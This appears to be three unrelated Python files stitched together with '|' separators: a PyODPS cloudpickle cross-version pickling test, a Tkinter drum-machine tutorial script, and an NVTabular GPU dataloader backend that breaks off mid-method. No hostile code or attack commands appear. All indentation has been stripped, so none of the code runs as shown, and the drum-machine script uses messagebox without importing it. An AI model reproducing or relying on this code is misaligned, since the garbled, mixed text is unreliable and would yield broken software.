# -*- coding: utf-8 -*-
# Copyright 1999-2017 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import base64
import json
import multiprocessing
import os
import pickle
import subprocess
import sys
import tempfile
import textwrap
import traceback
import uuid
from odps.compat import six, unittest, PY27
from odps.lib.cloudpickle import loads, dumps
from odps.utils import to_binary
from odps.tests.core import TestBase, numpy_case
# if bytecode needed in debug, switch it on
DUMP_CODE = False
CROSS_VAR_PICKLE_CODE = """
import base64
import json
import sys
import platform
import os
import pickle
try:
os.unlink(os.path.realpath(__file__))
except Exception:
pass
import_paths = json.loads(r\"\"\"
{import_paths}
\"\"\".strip())
sys.path.extend(import_paths)
from odps.lib.cloudpickle import dumps
from odps.utils import to_str
from {module_name} import {method_ref}
client_impl = (sys.version_info[0],
sys.version_info[1],
platform.python_implementation().lower())
result_obj = {method_ref}()
result_tuple = (
base64.b64encode(dumps(result_obj, dump_code={dump_code})),
client_impl,
)
with open(r'{pickled_file}', 'w') as f:
f.write(to_str(base64.b64encode(pickle.dumps(result_tuple, protocol=0))))
f.close()
""".replace('{module_name}', __name__).replace('{dump_code}', repr(DUMP_CODE))
def pickled_runner(q, pickled, args, kwargs, **kw):
try:
wrapper = kw.pop('wrapper', None)
impl = kwargs.pop('impl', (3, 5, 'cpython'))
if wrapper:
wrapper = loads(wrapper)
else:
wrapper = lambda v, a, kw: v(*a, **kw)
deserial = loads(base64.b64decode(pickled), impl=impl, dump_code=DUMP_CODE)
q.put(wrapper(deserial, args, kwargs))
except:
traceback.print_exc()
raise
def run_pickled(pickled, *args, **kwargs):
pickled, kwargs['impl'] = pickle.loads(base64.b64decode(pickled))
wrapper_kw = {}
if 'wrapper' in kwargs:
wrapper_kw['wrapper'] = dumps(kwargs.pop('wrapper'))
queue = multiprocessing.Queue()
proc = multiprocessing.Process(target=pickled_runner, args=(queue, pickled, args, kwargs), kwargs=wrapper_kw)
proc.start()
proc.join()
if proc.exitcode != 0:
raise SystemError('Pickle process exited abnormally.')
try:
return queue.get()
except:
return None
def _gen_nested_yield_obj():
out_closure = 10
class _NestClass(object):
inner_gain = 5
def __init__(self):
self._o_closure = out_closure
def nested_method(self, add_val):
if add_val < 5:
return self._o_closure + add_val * 2 + self.inner_gain
else:
return self._o_closure + add_val + self.inner_gain
class _FuncClass(object):
def __init__(self):
self.nest = _NestClass()
def __call__(self, add_val):
yield self.nest.nested_method(add_val)
return _FuncClass
def _gen_from_import_func():
def fun(val):
from numpy import sinh
return float(sinh(val))
return fun
class BuildMeta(type):
pass
class BuildBase(object):
pass
if six.PY2:
def _gen_class_builder_func():
out_closure = 10
def _gen_nested_class_obj():
class BuildCls(BuildBase):
__metaclass__ = BuildMeta
a = out_closure
def b(self, add_val):
print(self.a)
return self.a + add_val + out_closure
return BuildCls
return _gen_nested_class_obj
else:
py3_code = textwrap.dedent("""
def _gen_class_builder_func():
out_closure = 10
def _gen_nested_class_obj():
class BuildCls(BuildBase, metaclass=BuildMeta):
a = out_closure
def b(self, add_val):
print(self.a)
return self.a + add_val + out_closure
return BuildCls
return _gen_nested_class_obj
""")
my_locs = locals().copy()
six.exec_(py3_code, globals(), my_locs)
_gen_class_builder_func = my_locs.get('_gen_class_builder_func')
if sys.version_info[:2] < (3, 6):
def _gen_format_string_func():
out_closure = 4.0
def _format_fun(arg):
return 'Formatted stuff {0}: {1:>5}'.format(arg, out_closure)
return _format_fun
else:
py36_code = textwrap.dedent("""
def _gen_format_string_func():
out_closure = 4.0
def _format_fun(arg):
return f'Formatted stuff {arg}: {out_closure:>5}'
return _format_fun
""")
my_locs = locals().copy()
six.exec_(py36_code, globals(), my_locs)
_gen_format_string_func = my_locs.get('_gen_format_string_func')
if sys.version_info[:2] < (3, 6):
def _gen_build_unpack_func():
out_closure = (1, 2, 3)
def merge_kws(a, b, *args, **kwargs):
kwargs.update(dict(a=a, b=b))
kwargs.update((str(idx), v) for idx, v in enumerate(args))
return kwargs
def _gen_fun(arg):
t = out_closure + (4, ) + (5, 6, 7) + (arg, )
l = list(out_closure) + [4, ] + [5, 6, 7]
s = set(out_closure) | set([4]) | set([5, 6, 7])
m = {'a': 1, 'b': 2, 'c': 3, 'd': 4, 'e': 5}
wk = merge_kws(3, 4, 5, *(out_closure + (1, 2, 3)), **dict(m=1, n=2, p=3, q=4, r=5))
return t, l, s, m, wk
return _gen_fun
else:
py36_code = textwrap.dedent("""
def _gen_build_unpack_func():
out_closure = (1, 2, 3)
def merge_kws(a, b, *args, **kwargs):
kwargs.update(dict(a=a, b=b))
kwargs.update((str(idx), v) for idx, v in enumerate(args))
return kwargs
def _gen_fun(arg):
t = (*out_closure, *(4, ), *(5, 6, 7), *(arg, ))
l = [*out_closure, *(4, ), *[5, 6, 7]]
s = {*out_closure, *[4], *[5, 6, 7]}
m = {**dict(a=1, b=2), **dict(c=3), **dict(d=4, e=5)}
wk = merge_kws(3, 4, 5, *out_closure, *[1, 2, 3], **dict(m=1, n=2), **dict(p=3, q=4, r=5))
return t, l, s, m, wk
return _gen_fun
""")
my_locs = locals().copy()
six.exec_(py36_code, globals(), my_locs)
_gen_build_unpack_func = my_locs.get('_gen_build_unpack_func')
if sys.version_info[:2] < (3, 6):
def _gen_matmul_func():
out_closure = [[4, 9, 2], [3, 5, 7], [8, 1, 6]]
def _gen_fun(arg):
import numpy as np
a = np.array(out_closure)
b = np.array([9, 5, arg])
c = np.dot(a, b)
return repr(c)
return _gen_fun
else:
py36_code = textwrap.dedent("""
def _gen_matmul_func():
out_closure = [[4, 9, 2], [3, 5, 7], [8, 1, 6]]
def _gen_fun(arg):
import numpy as np
a = np.array(out_closure)
b = np.array([9, 5, arg])
c = a @ b
return repr(c)
return _gen_fun
""")
my_locs = locals().copy()
six.exec_(py36_code, globals(), my_locs)
_gen_matmul_func = my_locs.get('_gen_matmul_func')
def _gen_try_except_func():
out_closure = dict(k=12.0)
def _gen_fun(arg):
ex = None
agg = arg
def _cl():
print(ex)
try:
agg *= out_closure['not_exist']
except KeyError as ex:
agg += 1
try:
agg -= out_closure['k']
except KeyError as ex:
_cl()
agg /= 10
return agg
return _gen_fun
def _gen_nested_fun():
out_closure = 10
def _gen_nested_obj():
# class NestedClass(object):
def nested_method(add_val):
return out_closure + add_val
return nested_method
return lambda v: _gen_nested_obj()(*(v, ))
class Test(TestBase):
@staticmethod
def _invoke_other_python_pickle(executable, method_ref):
paths = [path for path in sys.path if 'odps' in path.lower()]
if callable(method_ref):
method_ref = method_ref.__name__
ts_name = os.path.join(tempfile.gettempdir(), 'pyodps_pk_cross_test_{0}.py'.format(str(uuid.uuid4())))
tp_name = os.path.join(tempfile.gettempdir(), 'pyodps_pk_cross_pickled_{0}'.format(str(uuid.uuid4())))
script_text = CROSS_VAR_PICKLE_CODE.format(import_paths=json.dumps(paths), method_ref=method_ref,
pickled_file=tp_name)
with open(ts_name, 'w') as out_file:
out_file.write(script_text)
out_file.close()
proc = subprocess.Popen([executable, ts_name])
proc.wait()
if not os.path.exists(tp_name):
raise SystemError('Pickle error occured!')
else:
with open(tp_name, 'r') as f:
pickled = f.read().strip()
f.close()
os.unlink(tp_name)
if not pickled:
raise SystemError('Pickle error occured!')
return pickled
def testNestedFunc(self):
func = _gen_nested_fun()
obj_serial = base64.b64encode(dumps(func))
deserial = loads(base64.b64decode(obj_serial))
self.assertEqual(deserial(20), func(20))
@unittest.skipIf(not PY27, 'Ignored under Python 3')
@numpy_case
def testFromImport(self):
executable = self.config.get('test', 'py3_executable')
if not executable:
return
func = _gen_from_import_func()
py3_serial = to_binary(self._invoke_other_python_pickle(executable, _gen_from_import_func))
self.assertEqual(run_pickled(py3_serial, 20), func(20))
@unittest.skipIf(not PY27, 'Ignored under Python 3')
def test3to2FormatString(self):
executable = self.config.get('test', 'py3_executable')
if not executable:
return
func = _gen_format_string_func()
py3_serial = to_binary(self._invoke_other_python_pickle(executable, _gen_format_string_func))
self.assertEqual(run_pickled(py3_serial, 20), func(20))
@unittest.skipIf(not PY27, 'Ignored under Python 3')
def test3to2BuildUnpack(self):
executable = self.config.get('test', 'py3_executable')
if not executable:
return
func = _gen_build_unpack_func()
py3_serial = to_binary(self._invoke_other_python_pickle(executable, _gen_build_unpack_func))
self.assertEqual(run_pickled(py3_serial, 20), func(20))
@unittest.skipIf(not PY27, 'Ignored under Python 3')
@numpy_case
def test3to2MatMul(self):
executable = self.config.get('test', 'py3_executable')
if not executable:
return
func = _gen_matmul_func()
py3_serial = to_binary(self._invoke_other_python_pickle(executable, _gen_matmul_func))
self.assertEqual(run_pickled(py3_serial, 20), func(20))
@unittest.skipIf(not PY27, 'Ignored under Python 3')
def test3to2TryExcept(self):
executable = self.config.get('test', 'py3_executable')
if not executable:
return
func = _gen_try_except_func()
py3_serial = to_binary(self._invoke_other_python_pickle(executable, _gen_try_except_func))
self.assertEqual(run_pickled(py3_serial, 20), func(20))
@unittest.skipIf(not PY27, 'Ignored under Python 3')
def test3to2NestedFunc(self):
executable = self.config.get('test', 'py3_executable')
if not executable:
return
func = _gen_nested_fun()
py3_serial = to_binary(self._invoke_other_python_pickle(executable, _gen_nested_fun))
self.assertEqual(run_pickled(py3_serial, 20), func(20))
def testNestedClassObj(self):
func = _gen_nested_yield_obj()
obj_serial = base64.b64encode(dumps(func))
deserial = loads(base64.b64decode(obj_serial))
self.assertEqual(sum(deserial()(20)), sum(func()(20)))
@unittest.skipIf(not PY27, 'Only runnable under Python 2.7')
def test3to27NestedYieldObj(self):
try:
executable = self.config.get('test', 'py3_executable')
if not executable:
return
except:
return
func = _gen_nested_yield_obj()
py3_serial = to_binary(self._invoke_other_python_pickle(executable, _gen_nested_yield_obj))
self.assertEqual(run_pickled(py3_serial, 20, wrapper=lambda fun, a, kw: sum(fun()(*a, **kw))),
sum(func()(20)))
@unittest.skipIf(not PY27, 'Only runnable under Python 2.7')
def test26to27NestedYieldObj(self):
try:
executable = self.config.get('test', 'py26_executable')
if not executable:
return
except:
return
func = _gen_nested_yield_obj()
py26_serial = to_binary(self._invoke_other_python_pickle(executable, _gen_nested_yield_obj))
self.assertEqual(run_pickled(py26_serial, 20, wrapper=lambda fun, a, kw: sum(fun()(*a, **kw))),
sum(func()(20)))
@unittest.skipIf(not PY27, 'Only runnable under Python 2.7')
def test3to27NestedClassObj(self):
try:
executable = self.config.get('test', 'py3_executable')
if not executable:
return
except:
return
cls = _gen_class_builder_func()()
py3_serial = to_binary(self._invoke_other_python_pickle(executable, _gen_class_builder_func))
self.assertEqual(run_pickled(py3_serial, 5, wrapper=lambda cls, a, kw: cls()().b(*a, **kw)),
cls().b(5))
|
3.08.py | """
Code illustration: 3.08
Adding support for multiple beat patterns
New methods added here:
- display_pattern_name()
- change_pattern()
- restart_play_of_new_pattern
Methods modified here:
- create_top_bar() - added a call to display_pattern_name()
- on_pattern_changed()
Chapter 3 : Programmable Drum Machine
Tkinter GUI Application Development Blueprints
"""
import os
import time
import threading
from tkinter import Tk, Entry, W, E, N, S, PhotoImage, Checkbutton, Button, \
Menu, Frame, Label, Spinbox, END, BooleanVar
from tkinter import filedialog
import pygame
PROGRAM_NAME = ' Explosion Drum Machine '
MAX_NUMBER_OF_PATTERNS = 10
MAX_NUMBER_OF_DRUM_SAMPLES = 5
MAX_NUMBER_OF_UNITS = 5
MAX_BPU = 5
INITIAL_NUMBER_OF_UNITS = 4
INITIAL_BPU = 4
INITIAL_BEATS_PER_MINUTE = 240
MIN_BEATS_PER_MINUTE = 80
MAX_BEATS_PER_MINUTE = 360
COLOR_1 = 'grey55'
COLOR_2 = 'khaki'
BUTTON_CLICKED_COLOR = 'green'
class DrumMachine:
def __init__(self, root):
self.root = root
self.root.title(PROGRAM_NAME)
self.all_patterns = [None] * MAX_NUMBER_OF_PATTERNS
self.beats_per_minute = INITIAL_BEATS_PER_MINUTE
self.current_pattern_index = 0
self.loop = True
self.now_playing = False
self.drum_load_entry_widget = [None] * MAX_NUMBER_OF_DRUM_SAMPLES
self.init_all_patterns()
self.init_gui()
def on_open_file_button_clicked(self, drum_index):
def event_handler():
file_path = filedialog.askopenfilename(defaultextension=".wav",
filetypes=[("Wave Files", "*.wav"), ("OGG Files", "*.ogg")])
if not file_path:
return
self.set_drum_file_path(drum_index, file_path)
self.display_all_drum_file_names()
return event_handler
def display_all_drum_file_names(self):
for i, drum_name in enumerate(self.get_list_of_drum_files()):
self.display_drum_name(i, drum_name)
def display_drum_name(self, text_widget_num, file_path):
if file_path is None:
return
drum_name = os.path.basename(file_path)
self.drum_load_entry_widget[text_widget_num].delete(0, END)
self.drum_load_entry_widget[text_widget_num].insert(0, drum_name)
#
# getters and setters begins
#
def get_current_pattern_dict(self):
return self.all_patterns[self.current_pattern_index]
def get_bpu(self):
return self.get_current_pattern_dict()['bpu']
def set_bpu(self):
self.get_current_pattern_dict()['bpu'] = int(self.bpu_widget.get())
def get_number_of_units(self):
return self.get_current_pattern_dict()['number_of_units']
def set_number_of_units(self):
self.get_current_pattern_dict(
)['number_of_units'] = int(self.number_of_units_widget.get())
def get_list_of_drum_files(self):
return self.get_current_pattern_dict()['list_of_drum_files']
def get_drum_file_path(self, drum_index):
return self.get_list_of_drum_files()[drum_index]
def set_drum_file_path(self, drum_index, file_path):
self.get_list_of_drum_files()[drum_index] = file_path
def get_is_button_clicked_list(self):
return self.get_current_pattern_dict()['is_button_clicked_list']
def set_is_button_clicked_list(self, num_of_rows, num_of_columns):
self.get_current_pattern_dict()['is_button_clicked_list'] = [
[False] * num_of_columns for x in range(num_of_rows)]
def init_all_patterns(self):
self.all_patterns = [
{
'list_of_drum_files': [None] * MAX_NUMBER_OF_DRUM_SAMPLES,
'number_of_units': INITIAL_NUMBER_OF_UNITS,
'bpu': INITIAL_BPU,
'is_button_clicked_list':
self.init_is_button_clicked_list(
MAX_NUMBER_OF_DRUM_SAMPLES,
INITIAL_NUMBER_OF_UNITS * INITIAL_BPU
)
}
for k in range(MAX_NUMBER_OF_PATTERNS)]
def display_pattern_name(self):
self.current_pattern_name_widget.config(state='normal')
self.current_pattern_name_widget.delete(0, 'end')
self.current_pattern_name_widget.insert(0,
'Pattern {}'.format(self.current_pattern_index))
self.current_pattern_name_widget.config(state='readonly')
def on_pattern_changed(self):
self.change_pattern()
def change_pattern(self):
self.current_pattern_index = int(self.pattern_index_widget.get())
self.display_pattern_name()
self.create_left_drum_loader()
self.display_all_drum_file_names()
self.create_right_button_matrix()
self.display_all_button_colors()
def on_number_of_units_changed(self):
self.set_number_of_units()
self.set_is_button_clicked_list(MAX_NUMBER_OF_DRUM_SAMPLES,
self.find_number_of_columns())
self.create_right_button_matrix()
def on_bpu_changed(self):
self.set_bpu()
self.set_is_button_clicked_list(MAX_NUMBER_OF_DRUM_SAMPLES,
self.find_number_of_columns())
self.create_right_button_matrix()
def play_in_thread(self):
self.thread = threading.Thread(target = self.play_pattern)
self.thread.start()
def on_play_button_clicked(self):
self.start_play()
self.toggle_play_button_state()
def start_play(self):
self.init_pygame()
self.play_in_thread()
def on_stop_button_clicked(self):
self.stop_play()
self.toggle_play_button_state()
def toggle_play_button_state(self):
if self.now_playing:
self.play_button.config(state="disabled")
else:
self.play_button.config(state="normal")
def exit_app(self):
self.now_playing = False
if messagebox.askokcancel("Quit", "Really quit?"):
self.root.destroy()
def stop_play(self):
self.now_playing = False
def init_pygame(self):
pygame.mixer.pre_init(44100, -16, 1, 512)
pygame.init()
def play_sound(self, sound_filename):
if sound_filename is not None:
pygame.mixer.Sound(sound_filename).play()
def get_column_from_matrix(self, matrix, i):
return [row[i] for row in matrix]
def play_pattern(self):
self.now_playing = True
self.toggle_play_button_state()
while self.now_playing:
play_list = self.get_is_button_clicked_list()
num_columns = len(play_list[0])
for column_index in range(num_columns):
column_to_play = self.get_column_from_matrix(
play_list, column_index)
for i, item in enumerate(column_to_play):
if item:
sound_filename = self.get_drum_file_path(i)
self.play_sound(sound_filename)
time.sleep(self.time_to_play_each_column())
if not self.now_playing: break
if not self.loop: break
self.now_playing = False
self.toggle_play_button_state()
def time_to_play_each_column(self):
beats_per_second = self.beats_per_minute / 60
time_to_play_each_column = 1 / beats_per_second
return time_to_play_each_column
def on_loop_button_toggled(self):
self.loop = self.loopbuttonvar.get()
def on_beats_per_minute_changed(self):
self.beats_per_minute = int(self.beats_per_minute_widget.get())
def init_is_button_clicked_list(self, num_of_rows, num_of_columns):
return [[False] * num_of_columns for x in range(num_of_rows)]
def get_button_value(self, row, col):
return self.all_patterns[self.current_pattern_index][
'is_button_clicked_list'][row][col]
def find_number_of_columns(self):
return int(self.number_of_units_widget.get()) * int(self.bpu_widget.get())
def process_button_clicked(self, row, col):
self.set_button_value(row, col, not self.get_button_value(row, col))
self.display_button_color(row, col)
def set_button_value(self, row, col, bool_value):
self.all_patterns[self.current_pattern_index][
'is_button_clicked_list'][row][col] = bool_value
def on_button_clicked(self, row, col):
def event_handler():
self.process_button_clicked(row, col)
return event_handler
def display_all_button_colors(self):
number_of_columns = self.find_number_of_columns()
for r in range(MAX_NUMBER_OF_DRUM_SAMPLES):
for c in range(number_of_columns):
self.display_button_color(r, c)
def display_button_color(self, row, col):
bpu = int(self.bpu_widget.get())
original_color = COLOR_1 if ((col//bpu) % 2) else COLOR_2
button_color = BUTTON_CLICKED_COLOR if self.get_button_value(
row, col) else original_color
self.buttons[row][col].config(background=button_color)
def create_play_bar(self):
playbar_frame = Frame(self.root, height=15)
start_row = MAX_NUMBER_OF_DRUM_SAMPLES + 10
playbar_frame.grid(row=start_row, columnspan=13,
sticky=W + E, padx=15, pady=10)
self.play_icon = PhotoImage(file="images/play.gif")
self.play_button = Button(
playbar_frame, text='Play', image=self.play_icon, compound='left', command=self.on_play_button_clicked)
self.play_button.grid(row=start_row, column=1, padx=2)
Button(playbar_frame, text='Stop', command=self.on_stop_button_clicked).grid(
row=start_row, column=3, padx=2)
self.loopbuttonvar = BooleanVar()
self.loopbuttonvar.set(True)
self.loopbutton = Checkbutton(
playbar_frame, text='Loop', command=self.on_loop_button_toggled, variable=self.loopbuttonvar)
self.loopbutton.grid(row=start_row, column=16, padx=5)
Label(playbar_frame, text='Beats Per Minute').grid(
row=start_row, column=25)
self.beats_per_minute_widget = Spinbox(playbar_frame, from_=MIN_BEATS_PER_MINUTE, to=MAX_BEATS_PER_MINUTE, width=5,
increment=5.0, command=self.on_beats_per_minute_changed)
self.beats_per_minute_widget.grid(row=start_row, column=30)
self.beats_per_minute_widget.delete(0,"end")
self.beats_per_minute_widget.insert(0,INITIAL_BEATS_PER_MINUTE)
photo = PhotoImage(file='images/signature.gif')
label = Label(playbar_frame, image=photo)
label.image = photo
label.grid(row=start_row, column=50, padx=1, sticky='w')
def create_right_button_matrix(self):
right_frame = Frame(self.root)
right_frame.grid(row=10, column=6, sticky=W +
E + N + S, padx=15, pady=4)
self.buttons = [[None for x in range(
self.find_number_of_columns())] for x in range(MAX_NUMBER_OF_DRUM_SAMPLES)]
for row in range(MAX_NUMBER_OF_DRUM_SAMPLES):
for col in range(self.find_number_of_columns()):
self.buttons[row][col] = Button(
right_frame, command=self.on_button_clicked(row, col))
self.buttons[row][col].grid(row=row, column=col)
self.display_button_color(row, col)
def create_left_drum_loader(self):
left_frame = Frame(self.root)
left_frame.grid(row=10, column=0, columnspan=6, sticky=W + E + N + S)
open_file_icon = PhotoImage(file='images/openfile.gif')
for i in range(MAX_NUMBER_OF_DRUM_SAMPLES):
open_file_button = Button(left_frame, image=open_file_icon,
command=self.on_open_file_button_clicked(i))
open_file_button.image = open_file_icon
open_file_button.grid(row=i, column=0, padx=5, pady=4)
self.drum_load_entry_widget[i] = Entry(left_frame)
self.drum_load_entry_widget[i].grid(
row=i, column=4, padx=7, pady=4)
def create_top_bar(self):
topbar_frame = Frame(self.root, height=25)
topbar_frame.grid(row=0, columnspan=12, rowspan=10, padx=5, pady=5)
Label(topbar_frame, text='Pattern Number:').grid(row=0, column=1)
self.pattern_index_widget = Spinbox(topbar_frame, from_=0, to=MAX_NUMBER_OF_PATTERNS - 1, width=5,
command=self.on_pattern_changed)
self.pattern_index_widget.grid(row=0, column=2)
self.current_pattern_name_widget = Entry(topbar_frame)
self.current_pattern_name_widget.grid(row=0, column=3, padx=7, pady=2)
Label(topbar_frame, text='Number of Units:').grid(row=0, column=4)
self.number_of_units_widget = Spinbox(topbar_frame, from_=1, to=MAX_NUMBER_OF_UNITS, width=5,
command=self.on_number_of_units_changed)
self.number_of_units_widget.delete(0,"end")
self.number_of_units_widget.insert(0,INITIAL_NUMBER_OF_UNITS)
self.number_of_units_widget.grid(row=0, column=5)
Label(topbar_frame, text='BPUs:').grid(row=0, column=6)
self.bpu_widget = Spinbox(topbar_frame, from_=1, to=MAX_BPU, width=5,
command=self.on_bpu_changed)
self.bpu_widget.grid(row=0, column=7)
self.bpu_widget.delete(0,"end")
self.bpu_widget.insert(0,INITIAL_BPU)
self.display_pattern_name()
def create_top_menu(self):
self.menu_bar = Menu(self.root)
self.file_menu = Menu(self.menu_bar, tearoff=0)
self.file_menu.add_command(label="Load Project")
self.file_menu.add_command(label="Save Project")
self.file_menu.add_separator()
self.file_menu.add_command(label="Exit")
self.menu_bar.add_cascade(label="File", menu=self.file_menu)
self.about_menu = Menu(self.menu_bar, tearoff=0)
self.about_menu.add_command(label="About")
self.menu_bar.add_cascade(label="About", menu=self.about_menu)
self.root.config(menu=self.menu_bar)
def init_gui(self):
self.create_top_menu()
self.create_top_bar()
self.create_left_drum_loader()
self.create_right_button_matrix()
self.create_play_bar()
if __name__ == '__main__':
root = Tk()
DrumMachine(root)
root.mainloop()
|
backend.py | #
# Copyright (c) 2021, NVIDIA CORPORATION.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import math
import queue
import threading
import warnings
from collections import OrderedDict
import cupy as cp
from nvtabular.dispatch import _concat, _is_list_dtype, _make_df, _pull_apart_list
from nvtabular.io.shuffle import _shuffle_df
from nvtabular.ops import _get_embedding_order
from nvtabular.tags import Tags
def _num_steps(num_samples, step_size):
return math.ceil(num_samples / step_size)
class ChunkQueue:
"""This class takes partitions (parts) from an NVTabular dataset
and concatenates them into a cudf dataframe "chunk". This chunk
is subsequently transformed into its tensor representation using
the iterator's transform.
Parameters
-----------
qsize: int
Max number of elements to hold in the buffer at once
num_parts : int
number of partitions from the iterator, an NVTabular Dataset to concatenate into a "chunk"
shuffle : bool
enable/disable chunk-level shuffling
put_wait: float
amount of timeout to wait for a full queue to open up
before checking for errors and trying again
"""
def __init__(self, dataloader, qsize, num_parts=1, shuffle=False, put_wait=1e-6):
self.num_parts = num_parts
self.shuffle = shuffle
self.put_wait = put_wait
self.q_out = queue.Queue(qsize)
self._stop_event = threading.Event()
indices = dataloader._gather_indices_for_dev(0)
self.itr = dataloader.data.to_iter(indices=indices)
self.dataloader = dataloader
def __len__(self):
return len(self.itr)
@property
def stopped(self):
return self._stop_event.is_set()
@property
def empty(self):
return self.q_out.empty()
def get(self):
return self.q_out.get()
def put(self, packet):
while True:
if self.stopped:
return True
try:
self.q_out.put(packet, timeout=self.put_wait)
return False
except queue.Full:
continue
def batch(self, itr):
"""
iterates through gpu_mem_frac size chunks of dataset
and concatenates every `num_parts` of them.
"""
current = []
while True:
try:
value = next(itr)
except StopIteration:
if len(current) > 0:
yield current
break
current.append(value)
if len(current) == self.num_parts:
yield current
current = []
def chunk_logic(self, itr):
spill = None
for chunks in self.batch(itr):
if self.stopped:
return
if spill and not spill.empty:
chunks.insert(0, spill)
chunks = _concat(chunks)
chunks.reset_index(drop=True, inplace=True)
chunks, spill = self.get_batch_div_chunk(chunks, self.dataloader.batch_size)
if self.shuffle:
chunks = _shuffle_df(chunks)
if len(chunks) > 0:
chunks = self.dataloader.make_tensors(chunks, self.dataloader._use_nnz)
# put returns True if buffer is stopped before
# packet can be put in queue. Keeps us from
# freezing on a put on a full queue
if self.put(chunks):
return
chunks = None
# takes care final batch, which is less than batch size
if not self.dataloader.drop_last and spill is not None and not spill.empty:
spill = self.dataloader.make_tensors(spill, self.dataloader._use_nnz)
self.put(spill)
def load_chunks(self, dev):
try:
itr = iter(self.itr)
if self.dataloader.device != "cpu":
with self.dataloader._get_device_ctx(dev):
self.chunk_logic(itr)
else:
self.chunk_logic(itr)
except Exception as e: # pylint: disable=broad-except
self.put(e)
# For when an iterator is stopped before iteration is complete.
def stop(self):
self._stop_event.set()
# TODO: should we be clearing? I can imagine a world where
# you want the thread to stop but still want to grab
# data out of the buffer
self.q_out.queue.clear()
def start(self):
self._stop_event.clear()
def get_batch_div_chunk(self, chunks, batch_size):
# TODO: is there a way to do this using cupy?
spill_idx = int(chunks.shape[0] / batch_size) * batch_size
spill = _make_df(chunks.iloc[spill_idx:])
chunks = _make_df(chunks.iloc[:spill_idx])
if not chunks.empty:
chunks.reset_index(drop=True, inplace=True)
if not spill.empty:
spill.reset_index(drop=True, inplace=True)
return chunks, spill
# TODO: implement as metaclass and assign methods to children
# to avoid having to do Dataset.<method> calls?
class DataLoader:
_use_nnz = False
def __init__(
self,
dataset,
batch_size,
shuffle,
cat_names=None,
cont_names=None,
label_names=None,
seed_fn=None,
parts_per_chunk=1,
device=None,
global_size=None,
global_rank=None,
drop_last=False,
sparse_names=None,
sparse_max=None,
sparse_as_dense=False,
):
self.data = dataset
self.indices = cp.arange(dataset.to_ddf().npartitions)
self.drop_last = drop_last
self.device = device or 0
self.sparse_names = sparse_names or []
self.sparse_max = sparse_max or {}
self.sparse_as_dense = sparse_as_dense
self.global_size = global_size or 1
self.global_rank = global_rank or 0
self.cat_names = cat_names or dataset.schema.select_by_tag(Tags.CATEGORICAL).column_names
self.cont_names = cont_names or dataset.schema.select_by_tag(Tags.CONTINUOUS).column_names
self.label_names = label_names or dataset.schema.select_by_tag(Tags.TARGETS).column_names
if not self.cat_names and not self.cont_names:
raise ValueError(
"Neither Categorical or Continuous columns were found by the dataloader. "
"You must either specify the cat_names, cont_names and "
"label_names properties or supply a schema.pbtxt file in dataset directory."
)
self.batch_size = batch_size
self.shuffle = shuffle
self.seed_fn = seed_fn
self.num_rows_processed = 0
# we set size of chunk queue to 1 we only want one chunk in queue at a time.
self._buff = ChunkQueue(self, 1, num_parts=parts_per_chunk, shuffle=shuffle)
# run once instead of everytime len called
self._buff_len = len(self._buff)
self._batch_itr = None
self._workers = None
def __len__(self):
batches = _num_steps(self._buff_len, self.batch_size)
if self.drop_last and self._buff_len % self.batch_size > 0:
batches = batches - 1
return batches
@property
def _working(self):
if self._workers is not None:
return any(t.is_alive() for t in self._workers)
return False
def stop(self):
# TODO: raise warning or even error if condition
# isn't met?
if self._workers is not None:
if not self._buff.stopped:
self._buff.stop()
for t in self._workers:
t.join()
# remove joined threads from list
self._workers = None
self._buff.q_out.queue.clear()
self._batch_itr = None
def _gather_indices_for_dev(self, dev):
# this should be self.indices divided by total processes, global set
if len(self.indices) < self.global_size:
warnings.warn(
f"""You have more processes({self.global_size}) than dataset
partitions({len(self.indices)}), reduce the number of processes."""
)
raise IndexError
per_worker = _num_steps(len(self.indices), self.global_size)
# identify process rank out of all processes (not local rank)
start = self.global_rank * per_worker
return self.indices[start : start + per_worker].tolist()
def _generate_local_seed(self):
random_state = cp.random.get_random_state()
seeds = random_state.tomaxint(size=self.global_size)
local_seed = seeds[self.global_rank]
cp.random.seed(local_seed.get())
def _shuffle_indices(self):
self._generate_local_seed()
if self.seed_fn:
new_seed = self.seed_fn()
cp.random.seed(new_seed)
cp.random.shuffle(self.indices)
self._generate_local_seed()
def __iter__(self):
self.stop()
self.num_rows_processed = 0
if self._buff.stopped:
self._buff.start()
# shuffle partition indices to bring disparate
# parts of the dataset "close" to one another
if self.shuffle:
self._shuffle_indices()
# build and start new threads for loading and
# concatenating data
self._workers = []
t = threading.Thread(target=self._buff.load_chunks, args=(self.device,))
t.daemon = True
t.start()
self._workers.append(t)
return self
def __next__(self):
return self._get_next_batch()
def _fetch_chunk(self):
chunks = self._buff.get()
if isinstance(chunks, Exception):
self.stop()
raise chunks
self._batch_itr = iter(chunks)
def _get_next_batch(self):
"""
adding this cheap shim so that we can call this
step without it getting overridden by the
framework-specific parent class's `__next__` method.
TODO: can this be better solved with a metaclass
implementation? My gut is that we don't actually
necessarily *want*, in general, to be overriding
__next__ and __iter__ methods
"""
# we've never initialized, do that now
# need this because tf.keras.Model.fit will
# call next() cold
if self._workers is None:
DataLoader.__iter__(self)
# get the first chunks
if self._batch_itr is None:
self._fetch_chunk()
# try to iterate through existing batches
try:
batch = next(self._batch_itr)
except StopIteration:
# anticipate any more chunks getting created
# if not, raise the StopIteration
if not self._working and self._buff.empty:
self._workers = None
self._batch_itr = None
raise
# otherwise get the next chunks and return
# the first batch
self._fetch_chunk()
batch = next(self._batch_itr)
# if batch[0] is empty but other exist
for sub in batch:
if sub is not None and len(sub) > 0:
self.num_rows_processed += len(sub)
break
return batch
def make_tensors(self, gdf, use_nnz=False):
split_idx = self._get_segment_lengths(len(gdf))
# map from big chunk to framework-specific tensors
chunks = self._create_tensors(gdf)
# if we have any offsets, calculate nnzs up front
